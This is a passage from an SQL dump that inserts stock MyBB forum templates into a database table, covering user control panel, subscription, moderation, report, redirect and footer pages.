<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotify\" id=\"pmnotify\" value=\"1\" {$pmnotifycheck} /></td> <td><span class=\"smalltext\"><label for=\"pmnotify\">{$lang->pm_notify}</label></span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td> </tr> <tr> <td colspan=\"2\"> <select name=\"subscriptionmethod\" id=\"subscriptionmethod\"> <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option> <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option> <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->date_time_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td><span class=\"smalltext\">{$lang->date_format}</span></td> </tr> <tr> <td> <select name=\"dateformat\"> {$date_format_options} </select> </td> </tr> <tr> <td><span class=\"smalltext\">{$lang->time_format}</span></td> </tr> <tr> <td> <select name=\"timeformat\"> {$time_format_options} </select> </td> </tr> <tr> <td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td> </tr> <tr> <td>{$tzselect}</td> </tr> <tr> <td><span class=\"smalltext\">{$lang->dst_correction}</span></td> </tr> <tr> <td> <select name=\"dstcorrection\"> <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option> <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option> <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option> </select> </td> </tr> </table> </fieldset> </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->forum_display_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> {$tppselect} <tr> <td><span class=\"smalltext\">{$lang->thread_view}</span></td> </tr> <tr> <td> <select name=\"daysprune\"> <option value=\"\">{$lang->use_default}</option> <option value=\"1\" {$daysprunesel[\'1\']}>{$lang->thread_view_lastday}</option> <option value=\"5\" {$daysprunesel[\'5\']}>{$lang->thread_view_5days}</option> <option value=\"10\" {$daysprunesel[\'10\']}>{$lang->thread_view_10days}</option> <option value=\"20\" {$daysprunesel[\'20\']}>{$lang->thread_view_20days}</option> <option value=\"50\" {$daysprunesel[\'50\']}>{$lang->thread_view_50days}</option> <option value=\"75\" {$daysprunesel[\'75\']}>{$lang->thread_view_75days}</option> <option value=\"100\" {$daysprunesel[\'100\']}>{$lang->thread_view_100days}</option> <option value=\"365\" {$daysprunesel[\'365\']}>{$lang->thread_view_year}</option> <option value=\"9999\" {$daysprunesel[\'9999\']}>{$lang->thread_view_all}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->thread_view_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"classicpostbit\" id=\"classicpostbit\" value=\"1\" {$classicpostbitcheck} /></td> <td><span class=\"smalltext\"><label for=\"classicpostbit\">{$lang->show_classic_postbit}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showsigs\" id=\"showsigs\" value=\"1\" {$showsigscheck} /></td> <td><span class=\"smalltext\"><label for=\"showsigs\">{$lang->show_sigs}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showavatars\" id=\"showavatars\" value=\"1\" {$showavatarscheck} /></td> <td><span class=\"smalltext\"><label for=\"showavatars\">{$lang->show_avatars}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showquickreply\" id=\"showquickreply\" value=\"1\" {$showquickreplycheck} /></td> <td><span class=\"smalltext\"><label for=\"showquickreply\">{$lang->show_quick_reply}</label></span></td> </tr> {$pppselect} <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->thread_mode}</span></td> </tr> <tr> <td colspan=\"2\"><select name=\"threadmode\"><option value=\"\">{$lang->use_default}</option><option value=\"linear\" {$threadview[\'linear\']}>{$lang->linear}</option><option value=\"threaded\" {$threadview[\'threaded\']}>{$lang->threaded}</option></select></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->other_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showredirect\" id=\"showredirect\" value=\"1\" {$showredirectcheck} /></td> <td><span class=\"smalltext\"><label for=\"showredirect\">{$lang->show_redirect}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showcodebuttons\" id=\"showcodebuttons\" value=\"1\" {$showcodebuttonscheck} /></td> <td><span class=\"smalltext\"><label for=\"showcodebuttons\">{$lang->show_codebuttons}</label></span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->style}</span></td> </tr> <tr> <td colspan=\"2\">{$stylelist}</td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->board_language}</span></td> </tr> <tr> <td colspan=\"2\"><select name=\"language\"><option value=\"\">{$lang->use_default}</option><option value=\"0\">-----------</option>{$langoptions}</select></td> </tr> </table> </fieldset> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_options\" /> <input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->update_options}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('51', 'usercp_subscriptions_none', '<tr> <td class=\"trow1\" colspan=\"7\">{$lang->no_thread_subscriptions}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('52', 'usercp_drafts_none', '<tr> <td class=\"trow1\" colspan=\"7\">{$lang->no_drafts}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('53', 'usercp_subscriptions_thread', '<tr> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td> <td class=\"{$bgcolor}\">{$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$new_class}\">{$thread[\'subject\']}</a><br /><span class=\"smalltext\">{$lang->notification_method} {$notification_type}</span></td> <td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td> <td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td> <td class=\"{$bgcolor}\" style=\"white-space: nowrap\"> <span class=\"smalltext\">{$lastpostdate} {$lastposttime}<br /> <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span> </td> <td class=\"{$bgcolor}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"check[{$thread[\'tid\']}]\" value=\"{$thread[\'tid\']}\" /></td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('54', 'usercp_subscriptions_remove', '<tr> <td class=\"tfoot\" colspan=\"7\"> <div class=\"float_right\"> <strong>{$lang->with_selected}</strong> <select name=\"do\"> <option value=\"delete\">{$lang->delete_subscriptions}</option> <option value=\"no_notification\">{$lang->update_no_notification}</option> <option value=\"instant_notification\">{$lang->update_instant_notification}</option> </select> {$gobutton} </div> <div> <strong><a href=\"usercp2.php?action=removesubscriptions&amp;my_post_key={$mybb->post_code}\">{$lang->remove_all_subscriptions}</a></strong> </div> </td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('55', 'header_welcomeblock_member_admin', ' &mdash; <a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php\">{$lang->welcome_admin}</a>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('56', 'forumdisplay_newthread', '<a href=\"newthread.php?fid={$fid}\"><img src=\"{$theme[\'imglangdir\']}/newthread.gif\" alt=\"{$lang->post_thread}\" title=\"{$lang->post_thread}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('57', 'showthread_threaded_bitactive', '<div style=\"margin-left: {$indentsize}px;\"><strong>{$post[\'subject\']}</strong> <span class=\"smalltext\">- {$lang->by} {$post[\'profilelink\']} - {$postdate} {$posttime}</span></div>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('58', 'showthread_threaded_bit', '<div style=\"margin-left: {$indentsize}px;\"><a href=\"showthread.php?tid={$tid}&amp;pid={$post[\'pid\']}&amp;mode=threaded\">{$post[\'subject\']}</a> <span class=\"smalltext\">- {$lang->by} {$post[\'profilelink\']} - {$postdate}, {$posttime}</span></div>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('59', 'showthread_poll', '<form action=\"polls.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"vote\" /> <input type=\"hidden\" name=\"pid\" value=\"{$poll[\'pid\']}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"4\" class=\"thead\" align=\"center\"><strong>{$lang->poll} {$poll[\'question\']}</strong></td> </tr> {$polloptions} </table> <table width=\"100%\" align=\"center\"> <tr> <td><input type=\"submit\" class=\"button\" value=\"{$lang->vote}\" /></td> <td valign=\"top\" align=\"right\"><span class=\"smalltext\">[<a href=\"polls.php?action=showresults&amp;pid={$poll[\'pid\']}\">{$lang->show_results}</a>{$edit_poll}]</span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$publicnote}</span></td> </tr> </table> </form>', '-2', '1604', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('60', 'forumdisplay_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customthreadtools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('61', 'forumdisplay_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('62', 'forumdisplay_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script> <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"fid\" value=\"{$fid}\" /> <input type=\"hidden\" name=\"modtype\" value=\"inlinethread\" /> <span class=\"smalltext\"><strong>{$lang->inline_thread_moderation}</strong></span> <select name=\"action\"> <option value=\"delayedmoderation\">{$lang->delayed_moderation}</option> <optgroup label=\"{$lang->standard_mod_tools}\"> <option value=\"multiclosethreads\" selected=\"selected\">{$lang->close_threads}</option> <option value=\"multiopenthreads\">{$lang->open_threads}</option> <option value=\"multistickthreads\">{$lang->stick_threads}</option> <option value=\"multiunstickthreads\">{$lang->unstick_threads}</option> <option value=\"multideletethreads\">{$lang->delete_threads}</option> <option value=\"multimovethreads\">{$lang->move_threads}</option> <option value=\"multiapprovethreads\">{$lang->approve_threads}</option> <option value=\"multiunapprovethreads\">{$lang->unapprove_threads}</option> </optgroup> {$customthreadtools} </select> <input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->inline_go} ({$inlinecount})\" id=\"inline_go\" />&nbsp; <input type=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" class=\"button\" /> </form> <script type=\"text/javascript\"> <!-- var go_text = \"{$lang->inline_go}\"; var all_text = \"{$threadcount}\"; var inlineType = \"forum\"; var inlineId = {$fid}; // --> </script> <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('63', 'forumdisplay_inlinemoderation_selectall', '<tr id=\"selectAllrow\" class=\"hiddenrow\"> <td colspan=\"8\" class=\"selectall\">{$lang->page_selected} <a href=\"#\" onclick=\'inlineModeration.selectAll();\'>{$lang->select_all}</a></td> </tr> <tr id=\"allSelectedrow\" class=\"hiddenrow\"> <td colspan=\"8\" class=\"selectall\">{$lang->all_selected} <a href=\"#\" onclick=\'inlineModeration.clearChecked();\'>{$lang->clear_selection}</a></td> </tr> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('64', 'search_threads_inlinemoderation_selectall', '<tr id=\"selectAllrow\" class=\"hiddenrow\"> <td colspan=\"8\" class=\"selectall\">{$lang->page_selected} <a href=\"#\" onclick=\'inlineModeration.selectAll();\'>{$lang->select_all}</a></td> </tr> <tr id=\"allSelectedrow\" class=\"hiddenrow\"> <td colspan=\"8\" class=\"selectall\">{$lang->all_selected} <a href=\"#\" onclick=\'inlineModeration.clearChecked();\'>{$lang->clear_selection}</a></td> </tr> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('65', 'search_posts_inlinemoderation_selectall', '<tr id=\"selectAllrow\" class=\"hiddenrow\"> <td colspan=\"9\" class=\"selectall\">{$lang->page_selected} <a href=\"#\" onclick=\'inlineModeration.selectAll();\'>{$lang->select_all}</a></td> </tr> <tr id=\"allSelectedrow\" class=\"hiddenrow\"> <td colspan=\"9\" class=\"selectall\">{$lang->all_selected} <a href=\"#\" onclick=\'inlineModeration.clearChecked();\'>{$lang->clear_selection}</a></td> </tr> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('66', 'report_thanks', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" align=\"center\"> <br /> <br /> <strong>{$lang->thank_you}</strong> <blockquote>{$lang->post_reported}</blockquote> <br /><br /> <div style=\"text-align: center;\"> <script type=\"text/javascript\"> <!-- document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\'); // --> </script> </div> </td> </tr> </table> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('67', 'report', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title> {$headerinclude} </head> <body> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" align=\"center\"> <br /> <br /> <strong>{$lang->report_to_mod}</strong> <form action=\"report.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_report\" /> <input type=\"hidden\" name=\"pid\" value=\"{$pid}\" /> <blockquote>{$lang->only_report}</blockquote> <br /> <br /> <span class=\"smalltext\">{$lang->report_reason}</span> <br /> <input type=\"text\" class=\"textbox\" name=\"reason\" size=\"40\" maxlength=\"250\" /> <br /> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->report_post}\" /></div> </form> </td> </tr> </table> </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('68', 'report_error', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\"> <tr> <td class=\"thead\"><span class=\"smalltext\"><strong>{$mybb->settings[\'bbname\']}</strong></span></td> </tr> <tr> <td class=\"trow1\">{$error}</td> </tr> </table> </body> </html>', '-2', '123', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('69', 'redirect', '<html> <head> <title>{$title}</title> <meta http-equiv=\"refresh\" content=\"2;URL={$url}\" /> {$headerinclude} </head> <body> <br /> <br /> <br /> <br /> <div style=\"margin: auto auto; width: {$lang->redirect_width}\" align=\"center\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$title}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\"><p>{$message}</p></td> </tr> <tr> <td class=\"trow2\" align=\"right\"><a href=\"{$url}\"><span class=\"smalltext\">{$lang->click_no_wait}</span></a></td> </tr> </table> </div> </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('70', 'gobutton', '<input type=\"submit\" class=\"button\" value=\"{$lang->go}\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('71', 'postbit_away', '<a href=\"{$post[\'profilelink_plain\']}\" title=\"{$lang->postbit_status_away}\"><img src=\"{$theme[\'imgdir\']}/buddy_away.gif\" border=\"0\" alt=\"{$lang->postbit_status_away}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('72', 'forumdisplay_thread_rating', '<td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" id=\"rating_table_{$thread[\'tid\']}\"> <ul class=\"star_rating{$not_rated}\" id=\"rating_thread_{$thread[\'tid\']}\"> <li style=\"width: {$thread[\'width\']}%\" class=\"current_rating\" id=\"current_rating_{$thread[\'tid\']}\">{$ratingvotesav}</li> </ul> <script type=\"text/javascript\"> <!-- Rating.build_forumdisplay({$thread[\'tid\']}, { width: \'{$thread[\'width\']}\', extra_class: \'{$not_rated}\', current_average: \'{$ratingvotesav}\' }); // --> </script> </td> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('73', 'forumdisplay_announcement_rating', ' <td class=\"{$bgcolor}\" align=\"center\"><img src=\"{$theme[\'imgdir\']}/pixel.gif\" alt=\"\" /></td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('74', 'forumdisplay_password', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->password_required} </title> {$headerinclude} </head> <body> {$header} <form action=\"{$_SERVER[\'REQUEST_URI\']}\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"2\"><strong>{$lang->password_required}</strong></td> </tr> <tr> <td class=\"trow2\" colspan=\"2\">{$lang->forum_password_note}</td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->enter_password_below}</strong></td> </tr> {$pwnote} <tr> <td class=\"trow1\" align=\"center\" colspan=\"2\"><input type=\"password\" class=\"textbox\" name=\"pwverify\" size=\"50\" value=\"\" /></td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->verify_forum_password}\" /></div> </form> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('75', 'error_maxsigimages', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->too_many_images}</strong></td> </tr> <tr> <td class=\"trow1\">{$lang->too_many_sig_images}<br /><span class=\"smalltext\">{$lang->too_many_sig_images2}</span> </td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('76', 'forumbit_depth2_forum', '<tr> <td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" /></td> <td class=\"{$bgcolor}\" valign=\"top\"> <strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$modlist}{$subforums}</div> </td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('77', 'forumbit_depth3', '{$comma}{$statusicon}<a href=\"{$forum_url}\" title=\"{$forum_viewers_text_plain}\">{$forum[\'name\']}</a>', '-2', '1404', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('78', 'forumbit_depth3_statusicon', '<img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"subforumicon ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('79', 'forumbit_subforums', '<br />{$lang->subforums} {$sub_forums}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('80', 'private_empty', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->empty_folders}</title> {$headerinclude} </head> <body> {$header} <form action=\"private.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->empty_folders}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"3\"><span class=\"smalltext\">{$lang->empty_note}</span></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><strong>{$lang->export_folder}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->num_messages}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->empty_q}</strong></td> </tr> {$folderlist} <tr> <td class=\"trow2\" align=\"center\" colspan=\"3\"><input type=\"checkbox\" class=\"checkbox\" name=\"keepunread\" value=\"1\" checked=\"checked\" /><strong>{$lang->keep_unread}</strong></td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_empty\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('81', 'usercp', '<html> <head> <title>{$lang->user_cp}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"{$colspan}\"><strong>{$lang->account_summary}</strong></td> </tr> <tr> {$avatar} <td class=\"trow2\"> <span class=\"largetext\">{$username}</span><br /> <strong>{$lang->postnum}</strong> <a href=\"search.php?action=finduser&amp;uid={$mybb->user[\'uid\']}\">{$mybb->user[\'posts\']}</a> {$lang->posts_day}<br /> {$reputation} <strong>{$lang->email}</strong> {$mybb->user[\'email\']}<br /> <strong>{$lang->registration_date}</strong> {$regdate}<br /> <strong>{$lang->primary_usergroup}</strong> {$usergroup}<br /> {$referral_info} </td> </tr> </table> {$latest_subscribed} {$latest_threads} {$latest_warnings} {$user_notepad} </td> </tr> </table> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('82', 'usercp_referrals', '<strong>{$lang->members_referred}</strong> {$mybb->user[\'referrals\']}<br /> {$referral_link}', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('83', 'usercp_reputation', '<strong>{$lang->reputation}</strong> {$reputation_link} [<a href=\"reputation.php?uid={$mybb->user[\'uid\']}\">{$lang->details}</a>]<br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('84', 'usercp_currentavatar', '<td class=\"trow1\" valign=\"middle\" align=\"center\" width=\"1\"><div class=\"usercp_container\"><img src=\"{$mybb->user[\'avatar\']}\" alt=\"{$mybb->user[\'username\']}\" title=\"{$mybb->user[\'username\']}\" {$avatar_width_height} /></div></td>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('85', 'footer', ' <br /> <div class=\"bottommenu\"> <div class=\"float_right\">{$lang_select}</div> <div> <span class=\"smalltext\"><a href=\"{$mybb->settings[\'contactlink\']}\">{$lang->bottomlinks_contactus}</a> | <a href=\"{$mybb->settings[\'homeurl\']}\">{$mybb->settings[\'homename\']}</a> | <a href=\"#top\">{$lang->bottomlinks_returntop}</a> | <a href=\"#content\">{$lang->bottomlinks_returncontent}</a> | <a href=\"<archive_url>\">{$lang->bottomlinks_litemode}</a> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=syndication\">{$lang->bottomlinks_syndication}</a></span> </div> </div> </div> <hr class=\"hidden\" /> <div id=\"copyright\"> <div id=\"debug\"><debugstuff></div> <!-- MyBB is free software developed and maintained by a volunteer community. It would be much appreciated by the MyBB Group if you left the full copyright and \"powered by\" notice intact, to show your support for MyBB. If you choose to remove or modify the copyright below, you may be refused support on the MyBB Community Forums. This is free software, support us and we\'ll support you. --> {$lang->powered_by} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB{$mybbversion}</a>, &copy; 2002-{$copy_year} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB Group</a>.<br /> <!-- End powered by --> <br /> <br class=\"clear\" /> <!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code --> {$auto_dst_detection} </div> </div>', '-2', '1413', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('86', 'private_archive_csv', '{$lang->export_date_sent},{$lang->export_folder},{$lang->export_subject},{$lang->export_to},{$lang->export_from},{$lang->export_message} {$pmsdownload}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('87', 'usercp_profile_customtitle', '<fieldset class=\"trow2\"> <legend><strong>{$lang->custom_usertitle}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->custom_usertitle_note}</span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->default_usertitle}</span></td> </tr> <tr> <td><span class=\"smalltext\"><strong>{$defaulttitle}</strong></span></td> </tr> <tr> <td><span class=\"smalltext\">{$lang->current_custom_usertitle}</span></td> </tr> <tr> <td><span class=\"smalltext\"><strong>{$user[\'usertitle\']}</strong></span></td> </tr> <tr> <td><span 